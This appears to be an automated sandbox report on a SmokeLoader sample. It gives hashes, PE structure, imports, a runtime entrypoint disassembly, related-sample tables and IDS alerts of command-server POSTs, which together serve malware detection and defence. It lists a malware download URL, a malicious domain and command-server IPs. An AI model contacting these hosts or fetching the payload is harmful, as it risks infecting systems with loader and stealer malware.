	MT5Um6Ykrl.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars Stealer	Browse	sdfjhuz.com/dl/build2.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nwgrus.ru	FyDBXJE74v.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	file.exe	Get hash	malicious	SmokeLoader	Browse	63.143.98.185
	fTKQwp8fRa.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	LgigaSKsL6.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.147.128.172
	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse	119.204.11.2
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	190.147.2.86
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse	187.211.161.52

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TelmexColombiaSACO	file.exe	Get hash	malicious	SmokeLoader	Browse	190.147.128.172
	na.elf	Get hash	malicious	Mirai	Browse	190.143.63.156
	7aodVUk6TV.elf	Get hash	malicious	Mirai, Okiru	Browse	186.86.212.65
	79VAlgfTk8.elf	Get hash	malicious	Mirai	Browse	181.56.182.151
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	190.147.2.86
	na.elf	Get hash	malicious	Mirai	Browse	190.143.63.127
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	190.156.239.49
	na.elf	Get hash	malicious	Mirai	Browse	190.156.168.129
	5zA3mXMdtG.exe	Get hash	malicious	SmokeLoader	Browse	181.52.122.51
	XvAqhy3FO6.elf	Get hash	malicious	Mirai, Okiru	Browse	200.118.227.2
LVLT-3549US	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	193.245.180.40
	YsI7t2OC5q.elf	Get hash	malicious	Mirai	Browse	35.248.229.35
	na.elf	Get hash	malicious	Mirai	Browse	67.16.179.196
	na.elf	Get hash	malicious	Mirai	Browse	67.73.174.73
	na.elf	Get hash	malicious	Mirai	Browse	67.73.174.73
	na.elf	Get hash	malicious	Mirai	Browse	67.73.174.73
	na.elf	Get hash	malicious	Mirai	Browse	67.73.174.73
	na.elf	Get hash	malicious	Mirai	Browse	67.73.174.73
	na.elf	Get hash	malicious	Mirai	Browse	67.73.174.73
	na.elf	Get hash	malicious	Mirai	Browse	67.73.174.73

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	294400
Entropy (8bit):	5.5821574905838105
Encrypted:	false
SSDEEP:	3072:iBILhZ6F7bBPQYK3+9L4xwafTdJ5+CyxF9DavCEkXFUCIqzpZAqa8i:iBI87b4SL4qw8/43kXFVIqzpZAqaR
MD5:	278DF1E655D9D27B659468EA21758D17
SHA1:	51D59CBC9E28708086517EA33FF07A9B2CFB3FCF
SHA-256:	2B727F4B529097748B5C49720BB42DA02EFB7758BF6870ACFD4404C24B60840B
SHA-512:	C7E6F1325D88EFB57AA123B52D4B4276024C267980F0C72D2F3F058E568A781AFB14207DDE6FC84B98BF308518D2B92304DA6939D8A2056D79E11089CDD8DEC7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39% Antivirus: Virustotal, Detection: 41%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..K~...~...~...`.x.e...`.i.n...`...4...Y...y...~.......`.v.....`.h.....`.m.....Rich~...........PE..L......d.................J...ls..............`....@...........................t.............................................4w..P.....r..............................................................................`...............................text...oI.......J.................. ..`.rdata..b ...`..."...N..............@..@.data...\|.o..........p..............@....dazit...D....q..8..................@....xepegi..(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wafguag:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.5821574905838105
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	K80v6DHFHE.exe
File size:	294'400 bytes
MD5:	278df1e655d9d27b659468ea21758d17
SHA1:	51d59cbc9e28708086517ea33ff07a9b2cfb3fcf
SHA256:	2b727f4b529097748b5c49720bb42da02efb7758bf6870acfd4404c24b60840b
SHA512:	c7e6f1325d88efb57aa123b52d4b4276024c267980f0c72d2f3f058e568a781afb14207dde6fc84b98bf308518d2b92304da6939d8a2056d79e11089cdd8dec7
SSDEEP:	3072:iBILhZ6F7bBPQYK3+9L4xwafTdJ5+CyxF9DavCEkXFUCIqzpZAqa8i:iBI87b4SL4qw8/43kXFVIqzpZAqaR
TLSH:	0B54D78252E12C07EFB64B328E39D5D4A62EFD525E7572EEA1047E0F14BB1B1E113B12
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..K~...~...~...`.x.e...`.i.n...`...4...Y...y...~.......`.v.....`.h.....`.m.....Rich~...........PE..L......d.................J.

File Icon


Icon Hash:	738733b18b838bec

Static PE Info

General

Entrypoint:	0x4018e4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6492C0AC [Wed Jun 21 09:19:40 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	f9644889fc4743405befff91cfd6f312

Entrypoint Preview

Instruction
call 00007F03308E1550h
jmp 00007F03308DDE4Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0041A3D0h], eax
mov dword ptr [0041A3CCh], ecx
mov dword ptr [0041A3C8h], edx
mov dword ptr [0041A3C4h], ebx
mov dword ptr [0041A3C0h], esi
mov dword ptr [0041A3BCh], edi
mov word ptr [0041A3E8h], ss
mov word ptr [0041A3DCh], cs
mov word ptr [0041A3B8h], ds
mov word ptr [0041A3B4h], es
mov word ptr [0041A3B0h], fs
mov word ptr [0041A3ACh], gs
pushfd
pop dword ptr [0041A3E0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041A3D4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041A3D8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041A3E4h], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0041A320h], 00010001h
mov eax, dword ptr [0041A3D8h]
mov dword ptr [0041A2D4h], eax
mov dword ptr [0041A2C8h], C0000409h
mov dword ptr [0041A2CCh], 00000001h
mov eax, dword ptr [00419008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0041900Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000F0h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17734	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2721000	0x29810	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16000	0x190	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1496f	0x14a00	017412b3a78f0e77be68b00d88053d64	False	0.8211292613636364	data	7.534628882954891	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x16000	0x2062	0x2200	160cce12c5b12d62944f68724786d475	False	0.36328125	data	5.445425145565832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x26fff7c	0x1400	8da7d0568b68a86023cfd4ba13def4fa	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dazit	0x2719000	0x4400	0x3800	b211778b80f6d441b6cf61ada776fc6d	False	0.0025809151785714285	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.xepegi	0x271e000	0x2800	0x2800	1276481102f218c981e0324180bafd9f	False	0.00322265625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2721000	0x29810	0x29a00	c7a219fd936649e9e6564e7104748d02	False	0.3730058183183183	data	4.758448918209474	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x273f0a8	0x2	data			5.0
RT_CURSOR	0x273f0b0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4276315789473684
RT_CURSOR	0x273f1f8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x273f328	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x27418f8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_CURSOR	0x27427b8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x27428e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x2721e00	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5674307036247335
RT_ICON	0x2722ca8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6376353790613718
RT_ICON	0x2723550	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.6849078341013825
RT_ICON	0x2723c18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7456647398843931
RT_ICON	0x2724180	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.512863070539419
RT_ICON	0x2726728	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6137429643527205
RT_ICON	0x27277d0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6163934426229508
RT_ICON	0x2728158	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.7553191489361702
RT_ICON	0x2728638	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.3347547974413646
RT_ICON	0x27294e0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5221119133574007
RT_ICON	0x2729d88	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.5846774193548387
RT_ICON	0x272a450	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6307803468208093
RT_ICON	0x272a9b8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.42686721991701243
RT_ICON	0x272cf60	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.5061475409836066
RT_ICON	0x272d8e8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.5079787234042553
RT_ICON	0x272ddb8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.3350213219616205
RT_ICON	0x272ec60	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.388086642599278
RT_ICON	0x272f508	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.39285714285714285
RT_ICON	0x272fbd0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.40534682080924855
RT_ICON	0x2730138	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.21950207468879668
RT_ICON	0x27326e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.2474202626641651
RT_ICON	0x2733788	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.2815573770491803
RT_ICON	0x2734110	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.31117021276595747
RT_ICON	0x27345f0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39285714285714285
RT_ICON	0x2735498	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5537003610108303
RT_ICON	0x2735d40	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6226958525345622
RT_ICON	0x2736408	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6372832369942196
RT_ICON	0x2736970	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.425422138836773
RT_ICON	0x2737a18	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.4209016393442623
RT_ICON	0x27383a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.46187943262411346
RT_ICON	0x2738870	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.279317697228145
RT_ICON	0x2739718	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.3664259927797834
RT_ICON	0x2739fc0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.3773041474654378
RT_ICON	0x273a688	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.3764450867052023
RT_ICON	0x273abf0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.2587136929460581
RT_ICON	0x273d198	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.27345215759849906
RT_ICON	0x273e240	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.28852459016393445
RT_ICON	0x273ebc8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.32180851063829785
RT_STRING	0x2745070	0xaa	data			0.5588235294117647
RT_STRING	0x2745120	0x600	data			0.4361979166666667
RT_STRING	0x2745720	0x460	data			0.45
RT_STRING	0x2745b80	0x64a	data			0.4360248447204969
RT_STRING	0x27461d0	0x7b8	data			0.4185222672064777
RT_STRING	0x2746988	0x6d0	data			0.4294724770642202
RT_STRING	0x2747058	0x76c	data			0.42526315789473684
RT_STRING	0x27477c8	0x606	data			0.4455252918287938
RT_STRING	0x2747dd0	0x7c2	data			0.42245720040281975
RT_STRING	0x2748598	0x810	data			0.42102713178294576
RT_STRING	0x2748da8	0x584	data			0.4461756373937677
RT_STRING	0x2749330	0x74c	data			0.4234475374732334
RT_STRING	0x2749a80	0x710	data			0.4303097345132743
RT_STRING	0x274a190	0x5f6	data			0.4325032765399738
RT_STRING	0x274a788	0x88	data			0.625
RT_GROUP_CURSOR	0x273f1e0	0x14	data			1.15
RT_GROUP_CURSOR	0x27418d0	0x22	data			1.088235294117647
RT_GROUP_CURSOR	0x27427a0	0x14	data			1.25
RT_GROUP_CURSOR	0x2744e90	0x22	data			1.088235294117647
RT_GROUP_ICON	0x272dd50	0x68	data	Turkish	Turkey	0.7019230769230769
RT_GROUP_ICON	0x2734578	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x273f030	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x27285c0	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x2738808	0x68	data	Turkish	Turkey	0.7211538461538461
RT_VERSION	0x2744eb8	0x1b4	data			0.5871559633027523

Imports

DLL	Import
KERNEL32.dll	OpenJobObjectA, ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, QueryDosDeviceA, InterlockedCompareExchange, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, FormatMessageA, SetCommState, GetLocaleInfoW, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, DeleteVolumeMountPointA, SetConsoleMode, GetFileAttributesW, GetBinaryTypeA, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, GetNumaHighestNodeNumber, LoadLibraryA, LocalAlloc, WritePrivateProfileStringA, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, SearchPathW, GetConsoleAliasExesLengthA, GetTimeFormatW, PulseEvent, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize
GDI32.dll	GetBoundsRect
ADVAPI32.dll	ClearEventLogW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-13T18:27:45.303931+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64968	148.230.249.9	80	TCP
2024-10-13T18:27:46.963293+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64969	148.230.249.9	80	TCP
2024-10-13T18:27:47.919755+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64970	148.230.249.9	80	TCP
2024-10-13T18:27:48.894639+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64971	148.230.249.9	80	TCP
2024-10-13T18:27:49.898590+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64972	148.230.249.9	80	TCP
2024-10-13T18:27:50.854819+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64973	148.230.249.9	80	TCP
2024-10-13T18:27:51.827443+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64974	148.230.249.9	80	TCP
2024-10-13T18:27:52.778261+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64975	148.230.249.9	80	TCP
2024-10-13T18:27:53.738201+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64976	148.230.249.9	80	TCP
2024-10-13T18:27:54.709329+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64977	148.230.249.9	80	TCP
2024-10-13T18:27:55.664115+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64978	148.230.249.9	80	TCP
2024-10-13T18:27:56.624121+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64979	148.230.249.9	80	TCP
2024-10-13T18:27:57.590520+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64981	148.230.249.9	80	TCP
2024-10-13T18:27:58.543210+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64987	148.230.249.9	80	TCP
2024-10-13T18:27:59.558359+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64993	148.230.249.9	80	TCP
2024-10-13T18:28:00.521490+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	64999	148.230.249.9	80	TCP
2024-10-13T18:28:01.500523+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65005	148.230.249.9	80	TCP
2024-10-13T18:28:02.470685+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65016	148.230.249.9	80	TCP
2024-10-13T18:28:03.627242+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65022	148.230.249.9	80	TCP
2024-10-13T18:28:04.593154+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65028	148.230.249.9	80	TCP
2024-10-13T18:28:05.564245+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65034	148.230.249.9	80	TCP
2024-10-13T18:28:06.520404+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65046	148.230.249.9	80	TCP
2024-10-13T18:28:07.527668+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65052	148.230.249.9	80	TCP
2024-10-13T18:28:08.550643+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65058	148.230.249.9	80	TCP
2024-10-13T18:28:09.504054+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65064	148.230.249.9	80	TCP
2024-10-13T18:28:10.465258+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65070	148.230.249.9	80	TCP
2024-10-13T18:28:11.447931+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65080	148.230.249.9	80	TCP
2024-10-13T18:28:12.404007+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65082	148.230.249.9	80	TCP
2024-10-13T18:28:13.361965+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65092	148.230.249.9	80	TCP
2024-10-13T18:28:14.318728+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65099	148.230.249.9	80	TCP
2024-10-13T18:28:15.828924+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65105	148.230.249.9	80	TCP
2024-10-13T18:28:16.790815+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65115	148.230.249.9	80	TCP
2024-10-13T18:28:17.753342+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65122	148.230.249.9	80	TCP
2024-10-13T18:28:18.775757+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65128	148.230.249.9	80	TCP
2024-10-13T18:28:19.728904+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65134	148.230.249.9	80	TCP
2024-10-13T18:28:20.704701+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65140	148.230.249.9	80	TCP
2024-10-13T18:29:26.607711+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65270	148.230.249.9	80	TCP
2024-10-13T18:29:28.771259+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65271	148.230.249.9	80	TCP
2024-10-13T18:29:30.033311+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65272	148.230.249.9	80	TCP
2024-10-13T18:29:31.548788+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65273	148.230.249.9	80	TCP
2024-10-13T18:29:32.705945+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65274	148.230.249.9	80	TCP
2024-10-13T18:29:38.370062+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65275	148.230.249.9	80	TCP
2024-10-13T18:29:43.415784+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65276	148.230.249.9	80	TCP
2024-10-13T18:29:48.487284+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65277	148.230.249.9	80	TCP
2024-10-13T18:29:53.628328+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65278	148.230.249.9	80	TCP
2024-10-13T18:29:59.682273+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65279	148.230.249.9	80	TCP
2024-10-13T18:30:06.086268+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65280	148.230.249.9	80	TCP
2024-10-13T18:30:12.261434+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65281	148.230.249.9	80	TCP
2024-10-13T18:30:21.478641+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65282	190.156.239.49	80	TCP
2024-10-13T18:30:27.201694+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65283	190.156.239.49	80	TCP
2024-10-13T18:30:33.413089+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65284	190.156.239.49	80	TCP
2024-10-13T18:30:39.987751+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65285	190.156.239.49	80	TCP
2024-10-13T18:30:45.633160+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65286	190.156.239.49	80	TCP
2024-10-13T18:30:52.041561+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65287	190.156.239.49	80	TCP
2024-10-13T18:30:57.539699+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65288	190.156.239.49	80	TCP
2024-10-13T18:31:04.509515+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65289	190.156.239.49	80	TCP
2024-10-13T18:31:10.096614+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	65290	190.156.239.49	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 18:27:44.322470903 CEST	64968	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:44.327584028 CEST	80	64968	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:44.327867985 CEST	64968	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:44.338875055 CEST	64968	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:44.338875055 CEST	64968	80	192.168.2.4	148.230.249.9
